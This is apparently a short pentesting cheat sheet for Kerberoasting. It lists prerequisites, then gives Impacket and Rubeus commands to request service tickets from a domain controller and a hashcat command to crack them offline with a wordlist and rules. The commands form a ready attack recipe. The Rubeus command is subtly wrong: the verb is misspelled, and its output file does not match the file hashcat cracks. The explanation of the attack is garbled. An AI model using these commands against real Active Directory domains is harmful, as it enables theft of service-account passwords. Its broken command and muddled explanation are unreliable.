Kerberoasting

About the Attack

When client requests service tickets to DC in order to access resource hosted by SPN, No ckecks are performed on DC to provide service ticket are encrypted using SPN's password hash. We get the ticket & bruteforce the password hash hence it is called Kerberosting.

Gear Up (Prereqs)

we need below information in order to perform this attack

User access i.e. User:Password
Domain Controller IP

Using Impacket

This command will be used when launching the attack from kali linux

sudo impacket-getuserSPNs -request -dc-ip $IP domain.com/user

Using Rubeus

rubeus.exe kerberost /outfile:hasehs.kerberost

Crack The Collected hash

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

We can also use custom rule or any other suitable wordlist.

About the Attack​

Gear Up (Prereqs)​

Using Impacket​

Using Rubeus​

Crack The Collected hash​

About the Attack

Gear Up (Prereqs)

Using Impacket

Using Rubeus

Crack The Collected hash